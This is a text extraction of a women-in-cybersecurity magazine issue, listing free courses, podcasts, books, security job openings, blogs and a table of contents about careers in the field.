Graduates of Free Code Camp have gotten jobs with tech companies like Microsoft, Google, and Apple, and you could be next. The site has long been considered an authority site for all levels to learn coding, and they offer some of the best free online technology courses around.

VISIT HERE

INFORMATION TECHNOLOGY FOUNDATIONS

This is an excellent self-paced course brought to you by Western Governor’s University and presented on the edX platform. It’s one of the top free online technology courses we have found for beginners, as it examines the discipline as a whole.

VISIT HERE

BUSINESS TECHNOLOGY MANAGEMENT SPECIALIZATION

This specialization in business technology management consists of six courses, each of which can be taken in audit mode for free on the Coursera platform. Free mode does not allow students to participate in capstone projects or earn certification, but the learning components of the courses are still available at no charge.

VISIT HERE

SOFTWARE TESTING

This terrific intermediate technology course on Udacity will give students a basic introduction to testing software. Entirely free, it is a one-month long program taught by industry pros. Students will be deliberately breaking software and identifying bugs on this handson course.

VISIT HERE

INTRODUCTION TO CYBERCRIME

Begin your journey into cybercrime with this cyber crime free course. Explore the various types of cyberattacks faced by organisations today. Understand the intricacies of cybersecurity threats and discover practical preventive measures. Whether you're new to the field or seeking to broaden your knowledge, this course provides essential insights to empower you in defending against cyber threats.

VISIT HERE

MANAGING CYBERSECURITY INCIDENTS AND DISASTERS

Most organisations plan for routine operations, but what happens when unexpected events overtake the routine? This course examines contingency planning used to prepare for and manage non-normal operations, including cybersecurity incidents – like hacking attempts, web site defacement, denial of service attacks, information disclosures; a well as other natural and man-made cybersecurity disasters.

VISIT HERE

THE LEARNING HUB

COMPUTER FORENSICS

Learners in this class study digital forensics fundamentals, including the four-step procedure concept. The course then moves into Unix/Linux fundamentals and Windows forensics and investigations. This course makes up part of NYU's five graduate-level course sequence leading to the MicroMasters® program in cybersecurity.

VISIT HERE

BUILDING A CYBERSECURITY TOOLKIT

If you own an information asset that’s valuable enough to the right adversary, it’s only a matter of time before there’s a breach. Today’s technologies attempt to keep adversaries out, but the sad fact is they will inevitably be defeated. This means a successful cybersecurity professional needs to have an expanded arsenal in their toolkit that extends far beyond technical proficiency.

VISIT HERE

INTRODUCTION TO COMPUTATIONAL THINKING AND DATA SCIENCE

There may be no better place to learn technology skills from the mother of all Tech schools—MIT. If you’ve ever wanted those three letters next to your name, bragging rights are yours by taking this course offered through the schools OpenCourseWare (OCW) program.

VISIT HERE

NEW TECHNOLOGIES FOR BUSINESS LEADERS

For entrepreneurs and business leaders looking for a broader understanding of the newest information technologies and how they can apply to business, this excellent course is the perfect fit. From virtual reality to blockchain to artificial intelligence, students will learn about and be empowered to embrace these emerging technologies as they improve their business practices.

VISIT HERE

DARKNET DIARIES

With Jack Rhysider

Since 2017, Darknet Diaries has investigated some of the most noteworthy stories related to the darkside of the internet, using a storytelling style that’s easy to follow for technical and nontechnical listeners alike.

SECURITY NOW

With Leo Laporte

The CyberWire is a cybersecurityfocused news service, and the CyberWire Daily Podcast delivers a rundown of the top cyber news each day of the week. It requires some baseline industry knowledge, but it’s a great way for security professionals to stay on top of InfoSec current events.

ELEVATE

With Kellie Kwarteng

The Elevate - Women in Tech Podcast is hosted by Halzak Founder Kellie Kwarteng. The episodes will feature inspiring Women in Tech who will be sharing their journeys and tips on how to navigate a career in tech.

THE TRAILBLAZERS JOURNEY

With Saima Majid

Do you have a curiosity about people, life and the world around you? Do you care about the issues that are affecting our world today? Are you passionate about self development? Does this adventure that we call life excite you?

RISE AND THRIVE

With Pamela Cass and Natalie Davis

Life throws curveballs, doesn't it?But what if you could turn those tough moments into stepping stones for growth? That's exactly what we explore on the Reignite Resilience podcast.

LET FEAR BOUNCE

With Kim Lengling

Welcome to Let Fear Bounce. Motivational and inspirational stories shared by people from around the world who have let fear bounce. I'm also going to throw in some pet stories. Why? Because I like to talk about my dog and you don't want to hear about me all the time!

SHELEADER IN A SHELL

With BCWT

SHEleader in a SHEll is a BCWT format that creates a bridge to the second international SHEleader@ digital conference.

FEMPIRE

With fempire

This podcast features front end women in tech. A monthly conversation with women in JavaScript talking about all things front end.

CYBERSECURITY TODAY

With Jim Love

Updates on the latest cybersecurity threats to businesses, data breach disclosures, and how you can secure your firm in an increasingly risky time.

CAREER DEVELOPMENT PODCASTS FOR EARLY CAREER WOMEN

With 9 to 5ish with theSkimm

In this podcast, theSkimm cofounders Carly Zakin and Danielle Weisberg sit down with women leaders from every industry imaginable, chatting about helpful topics for women just starting out in their careers.

CYBER SECURITY SAUNA

With Janne Kauhanen

Cyber Security Sauna brings you expert guests with sizzling insight into the latest information security trends and topics. WithSecure's Janne Kauhanen hosts the show to make sure you know all you need to about the hotter-than-ever infosec game. Join us as we sweat out the hot topics in security.

HOW WOMEN CAN BREAK THROUGH BARRIERS IN THE SECURITY INDUSTRY

With Aileen Garcia

Women have made significant strides in the security industry in recent years. Greater efforts by organisations like SIA and ASIS have been made to encourage women to enter the cybersecurity workforce, building foundational resources they did not have before.

BRAVE

Author // Sheila Vijeyarasa

Brave: Courageously live your truth sets out a clear roadmap for women to reclaim their personal power, providing them with the knowledge and courage to step into an authentic life. Learn how to listen to your intuition, follow your soul purpose and bravely live your truth.

BUY THE BOOK

EMPOWERMENT ECHOES & RESILIENCE REFLECTIONS

Author // Shannon Avery Briggs

The 'Empowerment Echoes and Resilience Reflections Journal' is a thoughtfully designed tool for personal growth, self-discovery, and healing. Created by Shannon Avery Briggs, a survivor and a beacon of resilience, this journal is a companion for anyone seeking to embark on a journey of empowerment and self-improvement.

BUY THE BOOK

WOMEN OF RESILIENCE: OVERCOMING OBSTACLES WITH GRACE

Author // Renee McLaurin

"Women of Resilience: Overcoming Obstacles with Grace" is a compelling book that embarks on a profound journey into the lives of women who have faced life's myriad challenges with unwavering strength and indomitable spirit.

BUY THE BOOK

BLACK HAT BASH

Author // Nick Aleks

In the hands of the penetration tester, bash scripting becomes a powerful offensive security tool. In Black Hat Bash, you'll learn how to use bash to automate tasks, develop custom tools, uncover vulnerabilities, and execute advanced, living-off-the-land attacks against Linux servers.

BUY THE BOOK

UNDERSTAND THE CYBER ATTACKER MINDSET: BUILD A STRATEGIC SECURITY PROGRAMME TO COUNTERACT THREATS

Author // Sarah Armstrong-Smith

To counteract a cyber attacker, organisations need to learn to think like one. Understand the Cyber Attacker Mindset explores the psychology of cyber warfare and how organisations can defend themselves against attacks.

BUY THE BOOK

THE CYBER EFFECT: A PIONEERING CYBERPSYCHOLOGIST EXPLAINS HOW HUMAN BEHAVIOUR CHANGES ONLINE

Author // Mary Aiken

Dr Mary Aiken is the world's leading expert in forensic cyberpsychology - a discipline that combines psychology, criminology and technology to investigate the intersection between technology and human behaviour. In this, her first book, Aiken has created a starting point for all future conversations about how the Internet is shaping our perception of the world, development and behaviour, societal norms and values, children, safety and security.

BUY THE BOOK

THE RISE OF THE CYBER WOMEN

Author // Lisa Ventura

The Rise of the Cyber Women series collects and celebrates interviews with professional woman working across the cyber security field. In this third volume we meet women at all stages of their careers and covering the full range of disciplines.

CYBERSPIRACY:

Author // Wolf O'Rourc

She flees from bullying into her dream world of dashing master spy dolls, blue-haired Katy Perry Barbies, and pink Hello Kitty dresses. But behind the virtual disguise of sixfoot-four hunk Cowabunga Dude, she hacks her way across the Dark Net. BUY THE BOOK

THE SHADOW WORLD

Authors // Craig Ford and Caity Randall

Much like in your house, shadows can be scary until you turn the light on. The same goes for the online world. Sometimes when we do not know what we are looking at or dealing with, it can be overwhelming and potentially dangerous.

BUY THE BOOK

CYBER HEROES: KIDS DEFENDING THE DIGITAL REALM

Author // Valarian Couch

Cyber Heroes: Kids Defending The Digital Realm is a unique book that teaches kids about staying safe online. It's written for children to help them understand the internet better and how to protect themselves from dangers. The book explains in simple terms how to be smart and safe when using the internet, social media, and games.

BUY THE BOOK

INCLUDED

Author // Jayneen Sanders

The aim of this story is to ensure all kids understand that kids with disability are just like kids everywhere. They love playing games, books, making stuff and being silly. They have things they are good at and things they need to work on. And just like kids everywhere they want to feel safe, loved and included.

BUY THE BOOK

CASTLE DEFENDERS: WHAT DO CYBER PARENTS DO?

Authors // Dana Meschiany and Pentera

Mommy is late for dinner again, and Emma and Oliver are frustrated. Daddy comes to the rescue with spaghetti and an enchanting tale of brave knights and mysterious castles, revealing how he and Mommy work tirelessly to protect the people on the internet from bad hackers and other online threats.

BUY THE BOOK

JOB BOARD

INTERN - TECHNOLOGY CONSULTING, CYBERSECURITY (SUMMER 2025)

| EY

FULL TIME SINGAPORE

THE OPPORTUNITY:

• Cyber threats, social media, massive data storage, privacy requirements and continuity of the business as usual require heavy information security measures. As a cybersecurity professional in EY Singapore, you will have the chance to work with an international connected team of specialists in serving our clients through providing independent assessments or implementation of cyber solutions that contributes toward their business resilience.

YOUR KEY RESPONSIBILITIES:

• Core Cybersecurity

• You will work with your project team and the client to execute engagements which help the client to measure the effectiveness of its cybersecurity programs, assess the cybersecurity risk of a client; evaluate the maturity of a security program, test the effectiveness of cyber controls, assist the client in complying with the various cyber policies and regulations, and help implement new cyber control processes and tools to perform more effective cyber risk management.

APPLY HERE

CYBER SECURITY STUDY & INTERNSHIP | REFONTE INFINIINFINIMENT GRAND

REMOTE NEW ZEALAND

JOB OVERVIEW:

Refonte's RIGTIP (Refonte Global Training & Internship Program) offers a unique Cybersecurity and DevSecOps training opportunity. In this comprehensive program, you’ll gain hands-on experience with realworld cybersecurity projects in a flexible, remote work environment. Collaborate with a diverse global team across Oceania, Asia, Europe, and the Americas as you build advanced skills in DevSecOps and cybersecurity.

KEY RESPONSIBILITIES:

• Design and deploy DevSecOps CI/CD pipelines incorporating Static Application Security Testing (SAST), Dynamic Application Security Testing (DAST), and Interactive Application Security Testing (IAST) to secure the software development lifecycle.

• Implement OWASP (Open Worldwide Application Security Project) practices in real-world projects to strengthen application security.

• Develop secure systems and expand your expertise in vulnerability assessment, reconnaissance, and risk mitigation to protect infrastructure and digital assets.

• Execute practical exploits to analyze and bolster system defenses.

• Conduct comprehensive risk assessments and develop threat models for robust web application security.

• Build and maintain a strategic vulnerability management framework.

• Utilize open-source intelligence tools for passive reconnaissance and execute footprinting as part of ethical hacking.

• Master scanning techniques using NMAP and NPING, conducting scans on target networks beyond IDS and firewall protections.

• Deepen your understanding of web applications, web servers, their potential vulnerabilities, and proactive security measures.

APPLY HERE

MANAGER, INFRASTRUCTURE SECURITY | GITLAB

REMOTE NEW ZEALAND

WHAT YOU’LL DO

• Contribute to the infrastructure security team’s vision and strategic roadmap

• Own and be responsible for securing

• GitLab’s customer-facing infrastructure which encompasses our multi-tenant, dedicated, government, and on-prem architectures.

• Infrastructure that supports GitLab’s software supply chain.

• Provide professional guidance and input on infrastructure security within and outside of your team

• Collaborate with other security teams in support of

• cross-team security efforts

• Process improvements

• Driving down risk across the organization

• Build collaborative cross-functional partnerships with teams across

• Infrastructure Engineering

• Engineering and Development

• Product Management; and

• Legal

• Manage an existing high performing team of infrastructure security professionals along with hiring new members as appropriate

• Lead and mentor your team by

• helping grow their skills and experience

• fostering a culture of continuous improvement

• holding regular 1:1’s

• being your team’s role model in terms of exemplifying GitLab company values, positive thinking, and managing conflict

• Establish and implement security policies, procedures, standards, and guidelines in support of infrastructure security

APPLY HERE

SENIOR SECURITY ANALYST (DETECTION ARCHITECT) | LAB3

CONTRACT AUSTRALIA

• This is an initial 6-month contract role. An AGSVA clearance is advantageous but not required

• This person (level 3) will hunt down threats with automation and leverage KQL expertise to craft powerful analytic detection rules within Microsoft Sentinel (Azure), automating threat hunting and refining strategies to stay ahead of the latest attacks. You'll be a key player, utilizing your custom detection rules to provide deep insights and support rapid incident resolution through automated workflows.

• You'll work closely with our SOC team, sharing knowledge and best practices while staying up-to-date with the evolving threat landscape. This will include leveraging automation tools to streamline your tasks and enhance our security posture.

• With years of cybersecurity experience and a proven track record in threat detection and response, you'll be a valuable asset to our SOC team where your KQL/SIEM expertise and analytical skills will be essential in protecting our organization and from emerging threats, while your ability to leverage automation will drive efficiency and effectiveness.

APPLY HERE

JOB BOARD

FREELANCE CYBERSECURITY EXPERT - AI TUTOR | MINDRIFT

REMOTE NEW ZEALAND

ABOUT THE ROLE

Generative AI models are improving very quickly, and one of our goals is to make them capable of addressing specialized questions and achieving complex reasoning skills.

In this role, you will use your skills to train AI systems to identify and exploit security weaknesses in a controlled and ethical manner. Your work will involve:

• Design and implement an indirect prompt injection attack that will expose a vulnerability of the user agent.

• Correcting the AI's responses based on domainspecific knowledge REQUIRED QUALIFICATIONS:

• Proven experience in penetration testing, ethical hacking, or a related cybersecurity field

• Proficiency with penetration testing tools such as Metasploit, Burp Suite, Nessus, and Nmap

• Strong understanding of networking protocols, operating systems, and web application security

• Knowledge of scripting languages (e.g., Python, PowerShell, Bash)

• Familiarity with OWASP Top Ten, MITRE ATT&CK Framework, and other security frameworks

• Relevant certifications such as CEH, OSCP, OSWE, or CISSP (preferred)

• Proficiency in English: advanced (C1) or above

• Excellent analytical and problem-solving skills

• Strong communication skills for reporting findings and collaborating with teams

• Our freelance role is fully remote so, you just need a laptop, internet connection, time available and enthusiasm to take on a challenge

CYBERSECURITY INFRASTRUCTURE | KYNDRYL

FULL TIME SPAIN

• Kyndryl’s Security & Resiliency is one of our most critical practices, ensuring enterprises, regardless of their size and complexity, remain secure, available, reliable, and resilient. We take Cybersecurity seriously. We're not just invested; we're committed. We're not just protecting data; we're empowering. Kyndryl is committed to making the world safer, not only by investing in state-of-the-art services and technologies but also by empowering underserved communities with essential cyber skills.

• When you walk through our doors, you're not only joining a team but you're also becoming part of a legacy. Welcome to Kyndryl, where Cybersecurity isn't just a job – it’s a passion; a commitment to designing, running, and managing the most modern and reliable technology infrastructure that the world depends on every day.

• Join us as a Cybersecurity Infrastructure Professional, where you'll be entrusted with the crucial task of maintaining and enhancing the infrastructure that is the backbone of our cybersecurity operations for our Fortune 500 clients. You'll be responsible for the

orchestration of infrastructure, keeping our systems protected from the relentless advances of physical and cyber adversaries.

• Your vigilance and technical expertise will be the shield that safeguards our computer systems, networks, and invaluable data from the threat of unauthorized access, theft, damage, and other malicious activities. Your domain will revolve around preserving the integrity of an IT infrastructure, the security of networks, and the sanctity of data.

• If you have a passion for cybersecurity and are looking for a role that combines cutting-edge technology with the thrill of safeguarding critical assets, then this role is your gateway to the world of cybersecurity heroism. Join us at Kyndryl, and let's build the future of digital security together.

APPLY HERE

APPLY HERE

TECHNOLOGY INFRASTRUCTURE & SYSTEMS SPECIALIST | MUFG BANK

FULL TIME SOUTH KOREA

ABOUT THE ROLE:

As one of core member of infrastructure/Operation member of Technology Infrastructure Services (TIS) of MUFG Seoul Branch;

• Responsible for providing secure and reliable system infrastructures such as servers, networks, stage, PC etc. and improving them with system management skill.

• Trouble shooting upon incidents, consideration of HA/ DR/BCP are included.

• Responsible for supporting and leading system development projects from system infrastructure and system operation point of view.

• Supporting to implement new project with an IT knowledge, industry trends and relevant laws & regulations.

• Working with regional office properly to support the implementation of regional projects at a branch level.

WHAT YOU WILL BE DOING:

• Based on in-depth understanding on branch strategy and initiatives, propose and promote strategic system initiatives

• Based on branch policy, establish systems and system platform

• Perform and behave as a core member to realize above

• Through efficient system operations and development, comply with the expense and investment budget and cut cost

• Minimize penalty cost close to zero because of system incidents and cyber security incidents

• Provide the environment of stable system operation to department of branch

• Work in partnership with colleagues across the various departments to support the implementation of regional projects at a branch level

• To realize advanced and efficient system operations and development, educate members and develop oneself

• Support, coach and guide team on complex IT Infrastructure issues

• Share movements and trends on HQ policy and cyber security risk, etc., proactively

WHAT WE ARE LOOKING FOR:

• Bachelor's degree or above

• Proven experience of managing infra-structure and project management

• Excellent communication skills both in verbal and written English

• Knowledge and skills on server, networking structure, project progress and management

• Overall understanding of infrastructure is required

• It would be ideal to have in-depth knowledge of networking APPLY

SECURITY ARCHITECTS | CGI

FULL TIME UNITED KINGDOM

• You’ll join a collaborative team of more than 230 members delivering 360° security services to clients across every domain that CGI operates in, from government, defence, healthcare and utilities to banking and financial services.

• As a Security Architect your innovative solutions and support will secure business systems, protecting what is most valuable to our clients.

• You’ll collaborate across enterprise architectures to produce end-to-end security designs, assisting on bids and proposals, as well as implementations and

integrations. Liaising with stakeholders at all levels, you’ll help build the full landscape security view that underpins systems resilience and client confidence. We need senior members who are design authorities, and junior members to work alongside them, developing their skills and understanding.

JOB BOARD

CYBERSECURITY ENGINEER | DATA MANAGEMENT GROUP

FULL TIME UNITED STATES

DETAIL JOB DESCRIPTION

• Seeking a Mid-Cyber Security Engineer to plan, and operate the security infrastructure and responses.

• The ideal candidate for this position has strong planning and operational experience with managing host-based security infrastructure, such as FireEye Endpoint HX, Cb App Control, MS Defender, and Symantec Endpoint Protection AND significant experience in managing network IDS/IPS systems, including FireEye NX and Cisco FIREPOWER appliances.

• MUST HAVE FIREEYE, FIREPOWER, CYBERARK

• Work from Home [WFH]- Client is on east coast, You can work anywhere in the continental USA.

• 1099/C2C Preferred

• Excellent written and verbal communication skills are required.

RESPONSIBILITIES

Customer Centricity

• Identifies and evaluates security trends, gathers customer insights (e.g., feedback around technical preferences, environments, business needs, competitive landscape), and maps architecture and digital transformation solutions to customer’s business outcomes.

• Acts as the voice of the customer by driving new feedback, insights, and resources to add and prioritize; connecting with Global Security teams at Microsoft, Engineering and Product teams to remove blockers and influence the solution roadmap.

• Develops and expands existing impactful relationships with CISOs, security practitioners, C-level technical decision makers (TDMs), and business stakeholders.

• Uncovers, aggregates, and synthesizes data about customer’s security posture and roadmap, complex technical requirements and issues and various technical strategies being proposed.

• Actively listens, creates, and sustains constructive tension and trust with customers by respectfully challenging their decisions and/or areas where they might do more and encouraging them to consider alternative architectures/solutions and approaches.

• Addresses security requirements/issues/strategies with win-win technical architecture(s) and demonstrates and proves the capability and value of those solutions through design collaboration sessions with the customer.

• Supports customer skilling by leading discussions on technical delivery with other internal and external stakeholders as a technical thought leader to influence customer readiness.

• Guides other team members to focus on customer experience through efficient delivery and ensuring a seamless and connected customer experience and shares best practices with the wider internal team.

Business Impact

• Drives their team in operating and optimizing complex and high-impact situations for strategic customers in collaboration with internal stakeholders (e.g., STU, CSAM, other Account Team members, Product Groups).

• Anticipates and manages business and security risks, and adapts methodology (e.g. Zero Trust, Security Adoption Framework, SFI) and applies governance to identify, communicate, and minimize business and security risks.

• Leverages standard tools to ensure accurate opportunity and milestone execution and pipeline hygiene.

• Owns complex customers relationships to anticipate, identify, propose resolution, and lead removal of technical blockers through regular security reviews and check-ins to accelerate consumption and usage.

• Proactively uses deep knowledge of the security portfolio, services, and value propositions of Microsoft and its competitors in customer conversations and to propose and coach others to develop new solutions to scale across multiple customers while demonstrating the business case and presenting alternative scenarios.

• Creates opportunities to expand or accelerate security usage and consumption (including through security related managed intellectual property [VBD, DE, EDE]) and leads these customer conversations.

• Leads the adoption of Microsoft’s Security offerings based on analysis/differentiation of Microsoft and competitor products to influence the industry-wide direction for specific architecture(s).

Technical Leadership

• Leverages market insights to assist leadership in defining global security vision by identifying relevant areas in which to drive up-skilling. Role models effective security skilling and influences team to drive their own technical readiness. Drives and engages others to adapt to changes aligned with SA priorities. Acts as a mentor to less experienced colleagues

by educating them on security and professional developmental concepts and sharing best practices.

• Leads virtual teams around technologies and customer challenges by sharing ideas, insights, and strategic, technical input with security teams, internal communities across the field, and the larger virtual team across Microsoft using knowledge of Microsoft architectures and their context in the competitive landscape.

• Organizes or presents at internal/industry security events (e.g., Ready, Build, Ignite, RSA, etc.). Demonstrates deep industry knowledge and drives recognition for Microsoft solutions through presentations and engagements with external audiences. Participates in external security community events (e.g., conferences, seminars, technical meetups, Webcasts, blogs, hackathons) and shares learnings across internal teams.

APPLY HERE

CYBER SECURITY MANAGER, VP, GCS SECURITY PLATFORMS | STATE STREET

FULL TIME IRELAND

WHAT WILL YOU BE RESPONSIBLE FOR

• Team leadership and management, developing better work practices and outputs to our internal customers

• Helping the team to grow, via positive feedback, training and skills enhancement

• Effective communication skills while collaborating across various departments in providing clear, regular updates related to issues

• Regularly engage with tools and operations teams, such as our Cyber Defence Team in Kilkenny, Ireland, to understand how to help them work more effectively through use of our pla forms

• Perform analytics on previous incidents and usage patterns to better predict issues and take proactive actions

• Ownership of security tooling problems and incidents that impact our internal stakeholders

• Ensure the security of State Street by delivering the most capable and reliable security tools for our incident responders and threat hunters

• Monitor the coverage or visibility of our security platforms to ensure effective detection and response of host and network borne threats

• Contribute and lead projects that improve current capabilities, drive adoption, and enable future growth

• Represent the function at various project and stakeholder meetings

SOC L3 SECURITY ANALYST | NETSACH GLOBAL

FULL TIME INDIA

• 7+ years of professional experience in cybersecurity

• Professional experience as an SOC Analyst (L2 or L3)

• experience as Threat researcher, hunter, or a similar role

• Advanced certifications such as SANS GIAC / GCIA / GCIH / CISSP /CISM or SIEM-specific training and certification. (Preferred with certifications on AZ-500, AZ-900 or SC-200)

• Proficiency in KQL query for log search and rule creation in sentinel and defender for EDR

• Malware analysis and Malware reverse engineering.

• Experience in CTF /bug bounty

• Experience in managing cybersecurity tools

• experience Vulnerability analysis/management.

APPLY HERE

THE END OF AN ERA

By Women Who Code

This non-profit organisation was established to inspire and empower women working in technology around the world. Not only do they provide training, networking and mentoring opportunities for professionals themselves, they also educate companies around how to retain, hire and promote talented women.

FEMGINEER

By Poornima Vijayashanker

Poornima Vijayashanker started Femgineer in 2007 as a creative platform for sharing her experiences working as the founding engineer with Mint. com. Thirteen years later, the organisation has developed into an education company for tech professionals wanting to build software products and companies.

SECURITY AFFAIRS

By Pierluigi Paganini

Security Affairs is a security blog written by Pierluigi Paganini, an ethical hacker, researcher, security evangelist, and analyst. On his blog, among the articles on security, you’ll also find regular interviews with hackers, useful cybersecurity. In 2016, this blog was awarded as Best European Personal Security Blog.

READ BLOG

WILL AI REPLACE DEVELOPERS

By Skillcrush

Skillcrush is an online coding school that wants to make learning about technology accessible and enjoyable for everyone. With a special focus on under-represented groups including women and mothers returning to work, they call themselves a “school with a heart”.

READ BLOG

ARCHITECT SECURITY

By April C. Wright

This cybersecurity blog belongs to April C. Wright who is a speaker, teacher, community leader, and hacker with more than 25 years of experience in the information security industry. She teaches others how to use simple actions that can lead to a better and safer place.

READ BLOG

ALEYDA SOLIS

By Aleyda Solis

You already know how important SEO is for getting organic traffic in your blog from the search results. Aleyda Solis, an SEO expert and professional speaker, will provide you with in-depth information and guides on search engine optimization. She is an inspiring personality to follow.

READ BLOG

ELIE BURSZTEIN’S BLOG

By Elie

Elie works at Google and leads the company’s anti-abuse research team, focused on protecting users against cybercriminal activities and Internet threats. His personal blog focuses on trending topics in cybersecurity such as Artificial Intelligence, network security, account security, and many more that could help users learn how to stay safe online.

READ BLOG

BLEEPING COMPUTER

By Bleeping Computer

Another fantastic resource is Bleeping Computer, a technical support website, and a selfeducation tool. Do read their cybersecurity guides, forums, tutorials, and more.

GIRL TALK HQ

By Asha Dahya

Asha Dahya grew up with many challenges and faced numerous barriers to get what she wanted. She started Girl Talk HQ, one of the best female empowerment blogs, to help amplify the voice of all those who go through difficulties and desire to grow. In this blog, you can expect honest and inspiring stories of women around the world. This is the best blog for women in their 20s.

READ BLOG

KREBS ON SECURITY

By Brian Krebs

Brian Krebs is the man behind Krebs on Security. Being hacked in 2001, he starts to be personally interested in online security. He’s one of the well-known names in today’s security landscape. Krebs covers topics from the latest threats, privacy breaches, and cyber-criminals, as well as major security news and alerts. He’s also a book author.

READ BLOG

ZERO DAY

By Zero Day

The Zero Day security blog is important for all the people part of the IT industry. This information security blog belongs to ZDNet and you should follow it to stay on top of the latest security analysis, software vulnerabilities, malware attacks, and network threats.

THE REGISTER

By The Register

The Register is another top online tech publication, with more than 9 million monthly unique visitors. You’ll find here independent news, views, and reviews on the latest in the IT industry and its security section brings the latest news from the industry.

READ BLOG

Women in Security Magazine Issue23

FROM THE PUBLISHER

End-of-year publisher’s note

ThankYou TO OUR SUPPORTING ASSOCIATIONS

THE RISE OF WOMEN IN CYBERSECURITY: A RESURGENCE POWERING CHANGE AND INNOVATION

BREAKING BARRIERS THROUGH EDUCATION AND MENTORSHIP

WOMEN LEADING CHANGE ACROSS CYBERSECURITY

A MEASURABLE IMPACT ON THE INDUSTRY’S FUTURE

ENCOURAGING THE NEXT GENERATION

A NEW ERA IN CYBERSECURITY

AMANDA-JANE TURNER

COLUMN

Renew your vigilance against cyber enabled fraud

WHAT’S HER JOURNEY?

Jahnavi Gurrappadia

Favour Ugwoke

Dorota Kozlowska

Ramona Ratiu

You to HELP Us Lights On

Opportunities

Full-Page Ads

Partner Magazine Ownership Opportunity

Event Promotion

Sponsored Articles

Esther Roberts

Cybersecurity Analyst and Penetration Tester at Port Harcourt

Lihansa Minradie Jayasinghe

Stacia Mason

CRAIG FORD

COLUMN

Climbing out of the ashes of failure

INDUSTRY PERSPECTIVES

CYBERSECURITY AND HARRY POTTER - PART 2: RISING ABOVE THE THREATS

THE TRIWIZARD TOURNAMENT: PREPARING FOR CYBER BATTLE

THE MARAUDER’S MAP: REAL-TIME THREAT VISIBILITY

THE DARK MARK: THE SILENT THREAT

DUMBLEDORE’S ARMY: THE POWER OF COLLABORATION

BREAKING THE BARRIERS: WOMEN IN CYBERSECURITY AND THE PATH TO A RESILIENT DIGITAL FUTURE

THE

THE OPPORTUNITY: WOMEN AS CHANGE AGENTS IN CYBERSECURITY

ADDRESSING BARRIERS: BRIDGING THE SKILLS GAP

COMBATING BURNOUT: PRIORITISING WELLBEING

BUILDING A CULTURE OF INCLUSION

A CALL TO ACTION FOR WOMEN AND ORGANISATIONS

WOMEN LEADING THE WAY FORWARD

ABOUT THE AUTHOR

THE PHOENIX EFFECT: WOMEN RESKILLING AND PIVOTING INTO CYBERSECURITY

THE GROWING NEED FOR CYBERSECURITY PROFESSIONALS

THE PHOENIX EFFECT: REINVENTING CAREERS IN CYBERSECURITY

THE IMPORTANCE OF LIFELONG LEARNING IN CYBERSECURITY

PROGRAMS SUPPORTING WOMEN’S CAREER CHANGES

TRANSFERABLE SKILLS AND THE POWER OF DIVERSITY

PRACTICAL ADVICE FOR WOMEN CONSIDERING A PIVOT TO CYBERSECURITY

SIMON CARABETTA

COLUMN

Whiskey for my men and women, beer for my horses

Source2Create Spotlight

Content

CAREER PERSPECTIVES

TRANSFORMING SETBACKS INTO AN UNSTOPPABLE RISE TO THE TOP

BEING THERE FOR THE CUSTOMER: FROM BUSINESS DEVELOPMENT ROOKIE TO CYBER SALES SPECIALIST

WOMEN EMPOWERING WOMEN

MOVING UP THE RANKS DOWN UNDER

PROVIDING CLARITY AND VALUE

SEIZING THE OPPORTUNITY

ALL THE DOORS THROUGH WHICH I’VE WALKED

AN INSPIRING TALE OF RESILIENCE, FOCUS, AND DETERMINATION FROM AN IT PROFESSIONAL TRANSITIONING INTO CLOUD SECURITY

WHAT’S HER JOURNEY: FINDING MY PATH IN CLOUD SECURITY

THE CHALLENGE OF FINDING DIRECTION IN TECH

THE HIRING DISCONNECT: BARRIERS TO ENTRY

THE HIGH COST OF CERTIFICATIONS

NETWORKING AND MENTORSHIP: BUILDING A SUPPORT SYSTEM

OVERCOMING IMPOSTER SYNDROME AND FIERCE COMPETITION

TRANSITIONING FULLY TO CLOUD SECURITY

LESSONS LEARNT ON MY JOURNEY

RISING THROUGH RESILIENCE

TECHNOLOGY PERSPECTIVES

FROM ASHES TO POWER: THE PHOENIX OF DATA SOVEREIGNTY RISES

THE RISE OF DATA SOVEREIGNTY: A REBIRTH OF CONTROL

TRIALS BY FIRE: AI COMPANIES IN A NEW REGULATORY ERA